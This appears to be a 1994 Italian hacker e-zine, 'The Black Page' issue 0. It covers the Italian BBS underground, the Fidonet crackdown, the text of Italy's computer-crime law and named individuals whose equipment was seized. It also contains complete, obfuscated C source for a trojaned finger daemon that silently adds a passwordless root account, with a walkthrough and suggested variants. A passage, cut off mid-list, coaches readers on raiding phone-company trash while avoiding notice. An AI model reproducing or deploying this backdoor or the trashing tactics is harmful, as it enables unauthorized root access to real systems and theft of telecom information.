Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
======================================
= =
= Panoramica sulla scena Telematica =
= Underground Italiana ed Europea =
= =
= by =
= * Dupree's Paradise * =
= =
======================================
Questo articolo e' stato realizzato in collaborazione con le seguenti brave
persone : NESSUNO.
Bene, questa e' proprio la parte difficile. Parlare della scena italiana
in un momento come questo e' una cosa strana e anche un po' difficile. Certo
sono ormai passati i tempi d'oro in cui era abbastanza facile circolare nelle
reti, c'era abbondanza di password e di sistemi, che da un anno e mezzo a que-
sta parte pero' cominciano a mancare.
Comunque, vogliamo provare a tracciare una panoramica della scena italia-
na ? Beh, allora direi che ci vuole un po' di "storia" ... iniziando dal pas-
sato, dalle prime BBS, i primi gruppi e tutte 'ste cazzate qua. Vi assicuro
che e' stato un lavoro da pazzi andare a beccare tutti i diretti interessati e
sentire i loro commenti ... almeno accendetemi un cero per onorarmi, oppure se
volete recitate pure tutto il PRCD in piedi aull'altare di una chiesa, comple-
tamente nudi :))))))))
Come non iniziare parlando del mitico Pier's Group ? Chi di voi lettori
non ha mai letto i racconti di Twin Phreacks, farebbe bene a scaricarseli su-
bito, dalla bbs DECODER, 02-29527597, aperta dalle 14 alle 8 del mattino. Li'
ci sono proprio tutti ! Scritti dal mitico MF The Best, sono veramente esila-
ranti.
Beh, secondo il mio MODESTISSIMO parere, che sicuramente trovera' molte
persone contrarie, il Pier's e' uno dei mitici gruppi che hanno segnato la
scena italiana in campo HP, con la loro ormai leggendaria BBS. L'ambiente era
veramente strano, particolare, la famosa "Area 7" in cui solo gli Elite pote-
vano entrare era una cosa (per quei tempi) allucinante, in cui si trovavano
chicche provenienti dagli USA.
Del Pier's abbiamo recuperato giusto qualche capture, di cui vi spariamo
qui qualcosa :
-------------------------------CAPTURE START--------------------------------
atd
CONNECT 1200
CONNECT 1200/NONE
Welcome to AmiExpress BBS Version 1.1x
You are connected to Node 0 at 1200 baud.
Connect time is Thu May 07 14:28:45 1992
ANSI graphics (Y/n)? N
__ ____________________
_____ __ _____________ / /\ ______ / \
/ ___ \ / // ______ ___ \ /_/ / / ____/\ | E l i t e B B S |
/ /__/ // // /___ / /__/ /\ \_\/ / /____\/ \____________________/
/ /____// // ____/\/ / __/ / /___ /\
/ /\____/ // /____\/ / \ \_\/ _____/ / /
/_/ / /_________//_/ / \_\ /______/ /
\_\/ \_________\\_\/ \_\ \______\/ /\
_______ _____ __________ __ _____ S E L E C T E D
/ _____// ___ \ / ___ _ /\ / // ___ \ / \
/ /____ / /__/ /\/ /\_/ // / // // /__/ /\ U S E R S O N L Y
/ //_ // / __/ / / // // / // // /____/ / / \
/ /__/ // / \ \_\/ /_// // /_// // /\____\/ /__________\
/______//_/ / \_________/ \_____//_/ /
\______\\_\/ \________\/ \____\\_\/
(Pause)...Space to Resume:
Scanning Conference: Guru's Temple.....No mail today!
Scanning Conference: MS-DOS Warez.....No mail today!
(123456789)
Conf Access: XX_X_XXXX
Caller Num.: 5738
Lst Date On: 05-03-92
Security Lv: 10
# Times On : 6
Ratio DL/UL: 2/1
# Downloads: 1
# Uploads : 3
Bytes DL'd : 58020
Bytes UL'd : 20000000
Bytes Avail: 30000000
Conference 9: MS-DOS Warez Auto-ReJoined
Highest Msg: 507
L/Msg. Read: 0
L/Msg. Auto: 507
Searching for LOSS CARRIER Files!
/---------------------------\
| PIER'S GROUP BBS |
\---------------------------/
C: Comment to Sysop D: Download files
E: Enter Message F: File Listings
G: Goodbye (logoff) H: Display Help
J: Join a conference N: New files since a date
O: Operator page. (Chat) R: Read Messages
S: Your statistics U: Upload files
UR: Upload resume V: View a Text file
W: W(Edit) your stats X: Expert toggle
Z: Zippy search for text T: Local Time
?: This Menu ZOOM: Zoom Mail (See Help File)
M: - Change ANSI Mode
Pier's Group BBS [9:MS-DOS Warez] Menu (27 mins. left): j
_____ _____ _ _ _____ _____ _____ _____ _ _ _____ _____ _____
*****| *****| *|_ *| *****|*****| *****| *****| *| *| *****| *****| *****|
*| *| *| **|_*| *|_ *|_ *|__*| *| **| *| *| *|_ *|___
*| *| *| *|*|*| ***| ***| *****| ***| *|*|*| *| ***| *****|
*|___ *|__*| *| **| *| *|___ *|*| *|___ *| **| *|___ *|___ ____*|
*****| *****| *| *| *| *****| *| *| *****| *| *| *****| *****| *****|
1. LAMERLAND - New Users
2. BEST AMIGA W A R E Z
3. ..NOT READY.......
4. CONSOLE FILES ONLY ! .
5. ....NOT READY.....
6. Cyberpunks' PHREAKING
7. The Segret Nest!
8. Sysops' Utilities
9. MS-DOS W A R E Z
Conference Number: 7
Joining Conference: The Secret Nest
User who have access to Conf #7
______________________________________________________________________________
>-hacker-> Andrea Belli Astaroth
Axe! Bluelight Burglar
Capitan Uncino DEATHBRINGER DIRECT
Dr.Creator Dupree's Paradise Eniac
FLASH GORDON Federica GORDON GEKKO
Genius goblin H.D.Case Hydra
Ironside/tdt Jettero Heller Josh
Longobard Lost found MF THE BEST
Madman MarVin SR! Mark Anders
NCS POISON Phoenix
PiXiE Pier Pitagora
RED MUSTANG Remacoll SCSI
SEVEN /\/\ SIMONE NASA SUSPIRIA
Silver Spring Spider Splatter
TIMESCAPE TRON Tom-cat
Ugo Belli Vale Baggins Yosh
ZEN _/ane
______________________________________________________________________________
(Pause)...Space to Resume:
Highest Msg: 527
L/Msg. Read: 490
L/Msg. Auto: 527
-------------------------------END OF CAPTURE-------------------------------
Bei tempi quelli ! Tempi in cui, se uno veniva scoperto a boxare per soli
20 km di distanza, veniva deletato dalla board immediatamente ... tempi in cui
ogni upload-download doveva venire approvato ... tempi in cui si limitava al
massimo qualsiasi sputtanamento di info, cosa che invece oggi e' ai massimi
livelli, infatti non funge + un emerito cazzo. Ma comunque, certamente Pier's
non era l'unica BBS in Italia ad avere un simile ambiente, ma altre cosi' se-
rie non me ne ricordo. E se qualche stronzo mi avesse spedito del materiale,
invece di continuare a chiedermi "ma ra rivista quando esce" o "ma se ci scri-
vo solo io allora niente" adesso non stareste li' a dire "ma questo qui di re-
censione non ha scritto un cazzo, c'erano un mare di altri gruppi". La prossi-
ma volta invece di star li a farvi le seghe su Arky mandate del materiale !
Piuttosto se riscontrate delle stronzate mandatemi una mail dove volete,
alla fine della mag ci sono tutti gli indirizzi.
Ma comunque, gia' dalla schermata del Pier's si evince che c'era qualche
gruppo. gli INC, i Twin Phreacks (ma esistevano realmente?), i TDT ed altri,
di cui pregherei chiunque ha info di scrivermi una mail colle memberlist e le
attivita'. Ricordiamo ad esempio gli Omega Team che hanno scritto l'ormai fa-
mosa Box per Soundblaster, ma chi fossero i componenti, non se lo ricorda nes-
suno.
Oggi la scena e' ricoperta di gruppi piu' o meno vari. Ci sono i Techno-
Brains, che ora non si sa + che cazzo fanno perche' pare che abbiano subito
anche loro una inculata dal Fidobust, ma non vorrei sparar cazzate. Ci sono un
casino di gruppi vari, ma siccome nessuno mi ha aiutato non posso star qui da
solo ad enumerarli tutti.
E comunque oramai i tempi sono cambiati. Non si puo' fare + un cazzo, o
quasi. Faremmo bene, noi "vecchi", a rivederci qualcuno dei vecchi capture,
per raccogliere lo spirito di quei tempi andati, in cui si lavorava con soli-
darieta', e con uno spirito molto diverso da quello, di merda, che riempie
molte bbs di oggi, in cui non si trova piu' niente oltre a giochini del cazzo
per Amiga e IBM.
Rimandiamo al prossimo numero per un articolo piu' esauriente sulla pano-
ramica italiana. INVITIAMO PERTANTO TUTTI I GRUPPI ITALIANI E NON CHE VOGLIONO
FAR PARTE DELLA NS RECENSIONE STORICA A FARCI PERVENIRE UN MESSAGGIO RELATIVO
AL LORO GRUPPO, INDICANDO IL NOME, I MEMBRI, LE DATE DELLE FORMAZIONI, L'ATTI-
VITA' DEL GRUPPO, EVENTUALI AZIONI MITICHE COMPIUTE DAL GRUPPO (HACKERAGGI,
PROGRAMMI CREATI, DEMO, ECC.) ED ALTRO, AGLI INDIRIZZI DI POSTA ELETTRONICA
RIPORTATI IN CODA AL FILE. IL PGP E' OVVIAMENTE OBBLIGATORIO :)
Dupree's Paradise
-----------------------------------------------------------------
PUBBLICITA' REGRESSO
====================
D E C O D E R
B B S
--------------------
- Reti nel ciclone -
--------------------
a cura di
Ace
-
Note e legenda
--------------
Fidonet.man - e' un testo disponibile in molti BBS ed allegato agli archivi
dei principali mailer e tosser (programmi per point e bbs).
Se non lo trovate leggetevi la policy Fido che chiarisce
ugualmente vari meccanismi di rete. Nei prossimi numeri, se
possibile, ne analizzeremo insieme le parti piu' significative.
BSA - associazione cui aderiscono varie sw houses.
Si batte contro la pirateria del software. Se volete
un'interpretazione obiettiva e aperta della 518 rivolgetevi
pure a loro. Probabilmente vi diranno che anche sognare
windows (bhe e' piu' un incubo che altro...) piratato e'
illegale :-)
MTX - Vedi matrix.
RC - Regional Coordinator, il responsabile italiano per FidoNet.
Per contattarlo matrixate a 2:331/301 c/o Vertigo.
REC - Regional Echo Coordinator, il responsabile della gestione
(apertura, chiusura, etc) aree echo. Il REC in carica, Adolfo
Melilli, alloggia al 2:333/1.
Con questo dovrebbe essere tutto. Saluti e alla prossima!
Quasi dimenticavo: se volete contattarmi potete farlo lasciandomi un
messaggio nella CPE di Edi BBS (X25 22950135 NRC) oppure via matrix presso:
2:331/368 (FidoNet, se volete che il vostro messaggio sia pubblico :-)
65:1200/7 (CyberNet, gia' piu' sicuro)
Ci sarebbero altri 10 indirizzi ma penso che questi bastino!
Bye!
Ace
[ N.d.r in relazione alla BSA e al (C) software vi consigliamo di
leggere attentamente l'articolo 12 ;) ]
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 3
-------------------------------
- F I D O B U S T -
-------------------------------
The Fidonet CrackDown
by
Dupree's
(e che cazzo volete ? nessuno mi ha aiutato)
Art. 5
1.- Nell'articolo 616 del codice penale in quarto comma e' sostituito dal
seguente:
Agli effetti delle disposizioni di questa sezione, per "corrispondenza"
si intende quella epistolare, telegrafica, telefonica, informatica o
telematica ovvero effettuata con ogni altra forma di comunicazione a
distanza.
Art. 6
1.- Dopo l'articolo 617-ter del Codice penale sono inseriti i seguenti:
Art. 617-quater (Intercettazione, impedimento o interruzione illecita
di comunicazioni informatiche o telematiche).- Chiunque fraudolentemente
intercetta comunicazioni relative ad un sistema informatico o telematico o
intercorrenti tra piu' sistemi, ovvero le impedisce o le interrompe, e'
punto con la reclusione da sei mesi a quattro anni.
Salvo che il fatto non costituisca pii' grave reato, la stessa pena si
applica a chiunque rivela, mediante qualsiasi mezzo di infoamzione al
pubblico, in tutto o in parte, il contenuto delle comunicazioni di cui al
primo comma.
I delitti di cui al primo e secondo comma sono punibili a querela della
persona offesa.
Tuttavia si procede d'ufficio e la pena e' della reclusione da uno a
cinque anni se il fatto e' commesso:
1) in danno a un sistema informatico o telematico utilizzato dallo
Stato o da altro ente pubblico o da impresa esercente servizi
pubblici o di pubblica necessita';
2) da un pubblico ufficiale o da un incaricato di pubblico
servizio, con abuso dei poteri o con la violazione dei doveri
inerenti alla funzione o al servizio, ovvero con abuso della
qualita' di operatore di sistema;
3) da chi esercita anche abusivamente la professione di
investigatore privato.
Art. 617-quinques (Installazione di apparecchiature atte a
intercettare, impedire od interrompere comunicazioni informatiche o
telematiche).- Chiunque, fuori dai casi consentiti dalla legge, installa
apparecchiature atte ad intercettare, impedire o interrompere comunicazioni
relative ad un sistema informatico o telematico ovvero intercorrenti tra
piu' sistemi, e' punto con la reclusione da uno a quattro anni.
La pena e' della reclusione da uno a cinque anni nei casi previsti dal
quarto comme dell'articolo 617-quater.
Art. 617-sexies (Falsificazione, alterazione o soppressione del
contenuto di comunicazioni informatiche o telematiche).- Chiunque, al fine
di procurare a se o ad altri un vantaggio o di arrecare ad altri un danno,
forma falsamente ovvero altera o sopprime, in tutto o in parte, il
contenuto, anche occasionalmente intercettato, di taluna delle
comunicazioni relative ad un sistema informatico o telematico o
intercorrenti tra piu' sistemi, e' punito, qualora ne faccia uso o lasci
che altri ne facciano uso, con la reclusione da uno a quattro anni.
La pena e' della reclusione da uno a cinque anni nei casi previsti dal
quarto comme dell'articolo 617-quater.
Art. 7
1.- Nell'articolo 621 del codice penale, dopo il primo comma e' inserito il
seguente:
Agli effetti della disposizione di cui al primo comma e' considerato
documento anche qualunque supporto informatico contenente dati,
informazioni o programmi.
Art. 8
1.- L'articolo 623-bis del codice penale e' sostituito dal seguente:
Art. 623-bis (Altre comunicazioni o conversazioni).- Le disposizioni
contenute nella presente sezione, relative alle comunicazioni e
conversazioni telegrafiche, telefoniche, informatiche o telematiche, si
applicano a qualunque altra trasmissione a distanza di suoni, immagini o
altri dati.
Art. 9
1.- Dopo l'art. 635 del codice penale e' inserito il seguente:
Art. 635-bis (Danneggiamento di sistemi informatici e telematici).-
Chiunque distrugge, deteriora o rende, in tutto o in parte, inservibili
sistemi informatici o telematici altrui, ovvero programmi, informazioni o
dati altrui, e' punito, salvo che il fatto costituisca piu' grave reato,
con la reclusione da sei mesi a tre anni.
Se ricorre una o piu' circostanze di cui als econdo comma dell'art.
635, ovvero se il fatto e' commesso con abuso della qualita' di operatore
di sistema, la pena e' della reclusione da uno a quattro anni.
Art. 10
1.- Dopo l'art. 640-bis del cosice penale e' inserito il seguente:
Art. 640-ter (Frode informatica).- Chiunque, alterando in qualsiasi
modo il funzionamento di un sistema informatico o telematico o intervenendo
senza diritto con qualsiasi modalita' su dati, informazioni o programmi
contenuti in un sistema informatico o telematico o ad esso pertinenti,
procura a se o ad altri un ingiusto profitto con altrui danno, e' punito
con la reclusione da sei mesi a tre anni e con la multa da lire centomila a
due milioni.
La pena e' della reclusione da uno a cinque anni e della multa da lire
seicentomila a tre milioni se ricorre una delle circostanze previste dal
numero 1) del secondo comma dell'art.640, ovvero se il fatto e' commesso
con abuso della qualita' di operatore di sistema.
Il delitto e' punibile a querela della persona offesa, salvo che
ricorra taluna delle circostanze di cui al secondo comma o un'altra
circostanza aggravante.
Art. 11
1.- Dopo l'articolo 266 del CPP e' inserito il seguente:
Art. 266-bis (intercettazioni di comunicazioni informatiche o
telematiche).- Nei procedimenti relativi ai reati indicati nell'articolo
266, nonche' a quelli commessi mediante l'impiego di tecnologie
informatiche o telematiche, e' consentita l'intercettazione del flusso di
comunicazioni relativo a sistemi informatici o telematici ovvero
intercorrente tra piu' sistemi.
---------------------------------------------------------------------------
And now alcuni messaggi presi qua' e la' ...
-------------------------MESSAGGI------------------------------------------
Non fido:
----------
Vittorio Mori ex fido, non piu' bbs, sequestrato tutto
Curradini "Breakdown", sequestrato tutto
Giuseppe Paterno' "Il Tempio BBS", sequestrato tutto
Super pirata, Terni non identificato, sequestrato tutto
Riccardo Cassotti perquisito, BBS chiusa 8 mesi fa.
Points:
--------
Borghesi 2:331/204.3 sequestrato tutto
Caruso 2:331/204.6 sequestrato tutto
Bisanti ?? sequestrato tutto
Ciao
Felix
574 7-Lug-94 00:54 2949 V.Russo I Roma
-----------------------------------------------------------------------------
PeaceLink - studio legale avv.Guida
Vi giro un mes ricevuto da Alessandro Marescotti in area AVVENIMENTI. Valerio
Ciao Valerio!
Ieri notte mi chiedevi - per conto di Parrella - informazioni piu'
particolareggiate sui motivi che hanno indotto il Tribunale di Taranto a
rifiutare il dissequestro del BBS host di PeaceLink, cioe' quello di Pugliese.
Questo e' almeno cio' che ho capito nel sonno... ;-))
Particolari sulle motivazioni del mancato dissequestro si possono chiedere
all'avv.Francesco Guida, il cui numero dello studio e' 099/365812 (tel./fax).
Sara' fatta a questo punto una nuova richiesta di dissequestro, non piu' al
Tribunale del Riesame ma al Gip, adducendo motivazioni legali concernenti non
piu' la non regolarita' dell'azione del PM ma la peculiare azione del BBS in
termini di servizio la cui interruzione puo' causare danno alla comunita'. Mi
sono espresso in termini forse infelici, non sono un avvocato...
Circa le motivazioni del non dissequestro, il Tribunale del Riesame, nonostan-
te avesse avuto tutto il tempo di esaminare per bene la faccenda dato che
sussisteva lo sciopero degli avvocati, non ha voluto ficcardi in una faccenda
forse ritenuta troppo complicata ed inedita da riesaminare.
Certo e' che l'avv.Guida vorrebbe avere da qualcuno che in Italia ha un po' di
dati, la documentazione di dissequestri gia' avvenuti nei giorni scorsi, dopo
l'azione Hardware1 di Pesaro, con relative motivazioni.
Il Tribunale del Riesame ha evidenziato una cattiva volonta' di fondo, tanto
da ritenere che il contributo di 100 mila lire fornito dal Liceo Classico Ar-
chita di Taranto e dall'Istituto Professionale Archimede "per l'uso del BBS"
possano essere messi in relazione con l'accusa specifica che - ricordo - e'
del tutto assurda: Pugliese viene accusato di aver chiesto dalle 50 alle 200
mila lire a collegamento telematico per trasferire programmi commerciali. La
fonte di tale accusa e' coperta dal segreto istruttorio. Cio' che e' grave e'
che la Guardia di Finanza non l'abbia verificata prima di passarla al Pubblico
Ministero e che il Pubblico Ministero Benedetto Masellis, prima di accoglierla
e far eseguire la perquisizione da Pugliese, non abbia richesto al capitano
della Guardia di Finanza, tal Cazzato, una piu' precisa verifica delle fonti
(dal capitano ritenute altamente affidabili).
L'insieme di tutte queste "coincidenze" CI FA FORTEMENTE SOSPETTARE
sull'indipendenza e sulla reale spontaneita' dell'operazione.
Ragion per cui il nostro atteggiamento sta passando dal piano della cautela a
quello piu' "politico" del sospetto sulle finalita' che mal si celano dietro a
questa manovra che, colpendo Giovanni Pugliese, ha colpito tutti noi e - non
dimentichiamolo - il cuore di PeaceLink: piu' in alto non potevano mirare.
Se a settembre PeaceLink sara' piu' debole, vorra' dire che l'operazione era
ben congegnata e aveva un fine ben calcolato.
Ciao. Alessandro
[N.d.r. questo qui e' proprio PAZZO !!! P-A-Z-Z-O !!! La Redazione consiglia
al Sig. Berghella una seduta di ascolto del Modulo Musicale "BERGHELL.MOD" ]
-----------------------------FINE MESSAGGI-------------------------------
Beh, questo sembra essere tutto, per ora. Sicuramente mancheranno delle
cose, ma sicuramente ce ne troverete altre che non sapete, come magari alcuni
messaggi letti in area SYSOP che 'normalmente' un comune utente non potrebbe
leggere :)
Per finire alcune informazioni relative all' ORGANO :) che "DOVREBBE"
tutelare i diritti telematici di noi pazzi telemaniaci. Dico DOVREBBE perche'
per esempio anche la Associazione Fidonet Italia (AFI) avrebbe dovuto tutelare
i Sysop aiutandoli in qualche modo, ma invece se ne e' letteralmente
F-O-T-T-U-T-A lavandosene le mani.
Alcei nasce per dare la parola al cittadino elettronico. Alcei si richiama di-
rettamente all'esperienza di Electronic Frontier Foundation e di EFF ha il ri-
conoscimento pubblico e diretto.
Alcei non e' un'organizzazione di tendenza, non ha riferimenti politici o
ideologici, non chiede di essere finanziata dallo stato. Tutti vi possono
aderire, purche' ne rispettino lo statuto. A tutti chiediamo una quota
associativa e una collaborazione in qualsiasi forma: nessuno ci paga, non
abbiamo apparati.
Alcei non e' una "lobby". Non e' solo un gruppo di "difesa del consumatore".
Non nasciamo per aggiungere leggi a leggi, burocrazia a burocrazia: tutto cio'
che fonda sulla liberta' e sull'autoregolamentazione, sui codici che i sogget-
ti sociali sanno darsi autonomamente, funziona bene.
Con questo principio intendiamo muoverci su casi singoli cosi' come su terreni
generali: il diritto e la legislazione, che sono incompleti, l'informazione
che e' oggi del tutto assente, carente o imprecisa (e spesso pilotata da grup-
pi di interesse); l'elaborazione di una cultura dei nuovi mezzi.
Alcei non e' una "conferenza", un luogo solo di dibattito. E' e vuole essere
un'organizzazione operativa che lavora con pazienza, tutti i giorni, per co-
struire e difendere la libera cultura della telematica.
C'e' un grande vuoto da riempire, di idee e di lavoro.
Per ottenere un'adesione informata abbiamo creato un punto di riferimento
telematico dove potrai chiedere informazioni sulla nostra identita' e sui
nostri principi. Presto saranno pronti nuovi strumenti di circolazione
dell'informazione cui tutti potranno dare un contributo.
---------------------------------------------------------------
Per informazioni: <alcei@mailbox.iunet.it>
(fax: 06-3202346 o 02-867055)
---------------------------------------------------------------
Dupree's Paradise
-----------------------------------------------------------------
PUBBLICITA' REGRESSO
====================
CALL NOW
The BEST BBS for Cyberpunk & HP Stuff in Europe !!!
________________________________________________
/~ .~ / _ . ~/~ _ . |~ __ ~| _ . \~ _ _ ~/
// ____/_ |_\__/. | \__|. |__| | |_\__/\/ | | \/
/____ ~/ _|__|| | __|: _| _|__ || |
// . //: |_/. \: |_/. || |\ \\: |_/. \ |: |
/_____ /|________\______|__| \__\_______\ |__|
___________________________________________ ___________________
\~ _ _ ~/ _ . ~/ _ .\~ _ _ ~/ __ |~ ~\ |~~|~| _ . ~/~ .~ /
\/ | | \/ |_\__/ | \__\/ | | \/ / \|| \| || || \__// ____/_
|| | || _|__| | __ || | \\ \ /|: \ \ :| || ______ ~/
|: | |: |_/. \ |_/. \ |: | \ \/ || |\ .| ||_/. \/ . //
|__| |________\______\ |__| \____|__| \___|_|______\___ /
#include <stdio.h>
#define PATH_FINGER "/usr/ucb/finger"
#define CODE 161
char *HitCrypt(ch)
char *ch;
{
char *b;
b=ch;
while ((*(ch++)^=CODE)!=0x00);
return(b);
}
main(argc,argv)
int argc;
char *argv[];
{
register FILE *fp;
register int ch;
register char *lp;
int p[2];
static char exor[4][23]={
{201,200,213,CODE},
{142,196,213,194,142,209,192,210,210,214,197,CODE},
{201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194,
210,201,CODE},
{227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197,
143,143,143,CODE} };
#define ENTRIES 50
char **ap, *av[ENTRIES + 1], line[1024], *strtok();
#ifdef LOGGING /* unused, leave it for "strings" command */
#include <netinet/in.h>
struct sockaddr_in sin;
int sval;
sval = sizeof(sin);
if (getpeername(0, &sin, &sval) < 0)
fatal(argv[0],"getpeername");
#endif
if (!fgets(line, sizeof(line), stdin))
exit(1);
av[0] = "finger";
for (lp = line, ap = &av[1];;) {
*ap = strtok(lp, " \t\r\n");
if (!*ap)
break;
if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
*ap = "-l";
if (++ap == av + ENTRIES)
break;
lp = NULL;
}
if (pipe(p) < 0)
fatal(argv[0],"pipe");
switch(fork()) {
case 0:
(void)close(p[0]);
if (p[1] != 1) {
(void)dup2(p[1], 1);
(void)close(p[1]);
}
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
if (av[1])
if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
_exit(10);
fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
printf("%s\n", HitCrypt(&exor[3][0]));
fclose(fp);
break;
}
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
if (execv(PATH_FINGER, av)==-1)
fprintf(stderr,"No local finger program found\n");
_exit(1);
case -1:
fatal(argv[0],"fork");
}
(void)close(p[1]);
if (!(fp = fdopen(p[0], "r")))
fatal(argv[0],"fdopen");
while ((ch = getc(fp)) != EOF) {
putchar(ch);
}
exit(0);
}
fatal(prg,msg)
char *prg,*msg;
{
fprintf(stderr, "%s: ", prg);
perror(msg);
exit(1);
}
--------- + CUT HERE + ----------------------------------------------
I think it's quite easy to understand, first of all, inetd opens the
socket and pipes the the input data through the fingerd
* if (!fgets(line, sizeof(line), stdin))
* exit(1);
* av[0] = "finger";
* for (lp = line, ap = &av[1];;) {
* *ap = strtok(lp, " \t\r\n");
* if (!*ap)
* break;
* if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
* *ap = "-l";
here it gets the data from stdin and parses them (strtok) converting (due
to RFC742) any '/W' or '/w' old options in '-l'
* switch(fork()) {
* case 0:
* (void)close(p[0]);
* if (p[1] != 1) {
* (void)dup2(p[1], 1);
* (void)close(p[1]);
* }
the task goes into the background
* if (execv(PATH_FINGER, av)==-1)
* fprintf(stderr,"No local finger program found\n");
here the daemon executes the local finger with remote parameters
* (void)close(p[1]);
* if (!(fp = fdopen(p[0], "r")))
* fatal(argv[0],"fdopen");
* while ((ch = getc(fp)) != EOF) {
* putchar(ch);
the output is piped back to the remote system
That's how the finger daemon works... now the trojan, basically we'll
check out the input finger user till the magic code matches, then our
sleepin' trojan will wake up and do the job... let's examine my code
(decrypted)
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
if (av[1])
if (strcmp("hit",av[1])==0) {
if(!(fp=fopen("/etc/passwd","a")))
_exit(10);
fprintf(fp,"hit::0:0::/:/bin/csh\n");
printf("Backdoor activated...\n");
fclose(fp);
break;
}
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
When the "hit" magic code matches the trojan will modify the passwd adding
a fake unpassworded root user named "hit", so you can relogin as root,
cover your tracks and keep on working. Of course this is an example, you
can do what you want simply adding your custom code, you may remote cat a
log file without logging in, or remote kill an user, maybe root logins are
disabled so you have to make a suid shell and add a normal entry in the
passwd or open a port and so on, you can also use multiple codes if you
like. If the magic word doesn't match of course the finger will work out
normally.
<example>
# finger hit@666.666.666.666
[666.666.666.666]
Backdoor activated...
Well done! You have gained a root access.
(...)
# cat /etc/passwd
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
ingres:*:7:7::/usr/ingres:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
+::0:0:::
hit::0:0::/:/bin/csh
^^^ they run NIS... anyway our local root login will work fine
<example>
#finger hit@hacked.system.com
[hacked.system.com]
here is the log
user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
user: yit001 from: (...)
That's really useful to collect logfiles without logging in and leave
tracks everywhere.
Per la serie:
Vax, Assembler ed esaurimento nervoso :
---------------------------------------
Presentiamo :
MINCHIA !!!
===========
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 6
Prefazione:
-----------
Questo testo contiene le basi del trashing. Io non credo di esser molto prati-
co visto ke l'ho fatto solo un paio di volte, comunque qui ci sono le basi!
Trashing: Cos'e'?
-----------------
Il Trashing (scarto) e' l'azione della ricerca attraverso i rifiuti presi dai
bidoni della SIP o di qualunque altro Ufficio Telefonico. Lo scarto spesso
contiene cose molto importanti che possono essere da blokki notes dell'ufficio
per imparare ai nuovi operatori delle operazioni importanti (ad esempio.. il
tracciamento di linea.. ecc.) a come funziona un telefono (schemi e cazzate
simili)! In Aggiunta a quelle cose, si possono trovare anke elenchi telefoni-
ci. Nel prossimo paragrafo vedremo qualke suggerimento per eseguire quando o
mentre si esegue un trashing. Lo scarto puo' essere abbastanza fruttuoso e di-
vertente, basta ke venga fatto con attenzione senza prendere bicchieri di
caffe', merdate simili o addirittura essere arrestato!
[[ Nota della Redazione : Il testo e' stato pubblicato cosi' come ci e' perve-
nuto. Ice MC ci ha detto di averlo scritto durante una notte di insonnia tota-
le, in preda a strane visioni mistiche .. :) ]]
Primo Passo: COME LOCALIZZARE IL BERSAGLIO
------------------------------------------
Questo passo consiste nella scelta della posizione di dove far Trashing.
La posizione dove dovrai andare a far Trashing e' l'Ufficio di Scambio che e'
qui' dove succede tutto. Il modo piu' facile per trovare l' U.S. e' cercare
parecchie antenne giganti. (non e' difficile.. di solito stanno sopra i tetti
:-))
Spesso pero' in alcune citta', la spazzatura degli Uffici di Scambi non viene
gettato sotto l'edificio, quindi e' piu' complicato. Io consiglio di andare
alla sede centrale, dove stanno gli uffici per noleggiare telefoni, disabili-
tare numeri... e a volte.. xche' no? .. Abbonarsi a Itapac :-))
Un altro posto per fare trashing e' l'Ufficio di Smistamento dati. Trovarlo e'
molto semplice... questi hanno una sola porta centrale e nessuna finestra... o
una sola porta e qualke finestra con 3000 sbarre (da non confondere con il
carcere).
[[ NdR : In poche parole, i luoghi migliori sono : La centrale che si occupa
dello smistamento delle chiamate dei Cellulari, cioe' il famoso PONTE RADIO.
Spesso nella stessa costruzione del Ponte Radio si trovano anche i Pad di Ita-
Kaz quindi e' bene se si "trova" della spazzatura proveniente da li. In alter-
nativa c'e' sempre la Sede Centrale della Sip, dove cioe' vanno i clienti per
stipulare contratti, acquistare cellulari, telefoni, merdate, insomma, dove va
la gente a Farsi Fottere i Soldi dal (Dis)Servizio di Stato. ]]
Secondo Passo: EQUIPAGGIAMENTO
------------------------------
Ecco una piccola lista dell'equipaggiamento che potresti prendere:
Auto : Porte aperte e luci spente
L'auto non e' necessaria, ma e' utile x scappare veloce-
mente ed e' molto meglio che camminare con 4 sacconi gi-
ganti :-))
[[ NdR : Meglio non dare nell'occhio. Mai guardare direttamente eventuali per-
sone, se no ci si fa accorgere che e' in preparazione qualcosa. Scendete dal-
l'auto, mettetevi a chiacchierare come se niente fosse, fumate una sigaretta,
finche' le persone che possono vedervi mentre "agite" non se ne sono andate.
Ci vuole soprattutto pazienza. Fingete di guardare spesso l'orologio come se
aveste un appuntamento ... Fate soprattutto attenzione non solo alla gente per
la strada (dalle auto difficilmente si accorgono di cio' che fate) ma alla
gente sui balconi dei palazzi che ha un'ottima visuale !!! Inoltre ricordate
di posteggiare a circa 1 metro e mezzo dai cassonetti in modo da restare vici-
ni, fare prima e occultare di piu' la visuale. ]]
Persone: Piu' di uno .. ma meno di sei!
Non andare mai a far trashing da solo. E non portare mai
piu' di cinque persone con te. Questo potrebbe dare un
po' nell'okkio.. vedere sei o sette persone con i sacchi
in mano, abbigliamento scuro e torce ... potrebbero
pensare a una rapina :-) Io raccomando di andare in
tre, ecco un piccolo schema:
Numero di persone : 1 2 3 4 5 6
Persone per prendere i sacchi : 1 1 2 3 3 4
Persone per osservare in giro : 0 1 1 1 2 2
--------- CONSIGLIATO ----------: ^
